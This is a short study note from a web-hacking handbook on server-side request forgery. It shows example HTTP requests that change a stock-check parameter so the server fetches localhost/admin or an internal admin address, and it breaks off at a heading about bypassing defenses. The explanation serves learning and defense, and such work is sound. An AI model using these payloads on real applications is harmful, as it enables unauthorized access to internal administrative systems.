handbook/tools/3.Web-Hacking/4.Injection/SSRF/Notes/2.Common-Attacks.md
2024-08-31 01:07:22 +02:00

40 lines
1.2 KiB
Markdown

## Common Attacks
Attacks Against the Server Itself
- Attacker induces the application to make an HTTP request back to the server that is hosting the application (via loopback)
- Involves supplying the URL with a hostname like 127.0.0.1 or localhost
- Example code -- shopping application that allows user to check stock
```
POST /product/stock HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 118
stockApi=http://stock.weliketoshop.net:8080/product/stock/check%3FproductId%3D
6%26storeId%3D1
```
- Makes request to the URL
- Retrieves the stock status
- Return to the user
- Modify this for an attack:
```
POST /product/stock HTTP/1.0
Content-Type: application/x-www-form-
urlencoded
Content-Length: 118
stockApi=http://localhost/admin
```
- Server fetches contents of the /admin url and returns to the user
- Authenticates as the machine/server itself
Attacks Against Other Systems
- Assume there is an administrative interface at https://192.168.0.68/admin
- Attack can exploit and access this:
```
POST /product/stock HTTP/1.0
Content-Type: application/x-www-form-
urlencoded
Content-Length: 118
stockApi=http://192.168.0.68/admin
```
Circumventing Common SSRF Defenses